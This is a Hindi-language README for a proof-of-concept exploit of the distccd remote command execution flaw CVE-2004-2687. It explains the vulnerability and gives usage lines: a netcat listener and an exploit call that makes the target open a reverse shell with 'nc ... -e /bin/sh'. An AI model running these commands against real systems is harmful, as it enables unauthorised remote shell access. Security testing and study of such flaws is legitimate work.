
🖥️ -h3x0v3rl0rd- #️⃣ CVE-2004-2687 #️⃣ Python3 में अपग्रेड करें
अवलोकन
इस रिपॉजिटरी में distccd भेद्यता के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) एक्सप्लॉइट शामिल है, जिसे CVE-2004-2687 के रूप में पहचाना गया है। यह भेद्यता distccd डेमॉन में मौजूद है, जो distcc वितरित C/C++ कंपाइलेशन सिस्टम का हिस्सा है। जब गलत तरीके से कॉन्फ़िगर किया जाता है, तो distccd दूरस्थ हमलावरों को बिना किसी प्रमाणीकरण के सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति देता है।
भेद्यता विवरण
distcc को बिल्ड प्रक्रिया को तेज करने के लिए कई मशीनों में कंपाइलेशन कार्यों को वितरित करने के लिए डिज़ाइन किया गया है। हालाँकि, यदि distccd डेमॉन को ठीक से सुरक्षित नहीं किया गया है, तो यह रिमोट कोड एक्सीक्यूशन (RCE) भेद्यता को उजागर करता है। ऐसा इसलिए होता है क्योंकि डेमॉन एक नेटवर्क पोर्ट पर सुनता है और किसी भी क्लाइंट से कमांड स्वीकार करता है, जिससे वे डेमॉन चलाने वाले उपयोगकर्ता के रूप में सर्वर पर शेल कमांड निष्पादित कर सकते हैं।
इस भेद्यता को CVE-2004-2687 निर्दिष्ट किया गया है और यह distccd के संस्करण 3.1 से पहले के संस्करणों को प्रभावित करता है। जब इसका शोषण किया जाता है, तो एक हमलावर कमजोर मशीन पर शेल एक्सेस प्राप्त कर सकता है, जिससे पूरे सिस्टम से समझौता हो सकता है।
nc -lvp 4444
python3 distccd_rce.py -t [rhost] -p 3632 -c "nc [localhost] [lport] -e /bin/sh"
भेद्यता :

एक्सप्लॉइट :
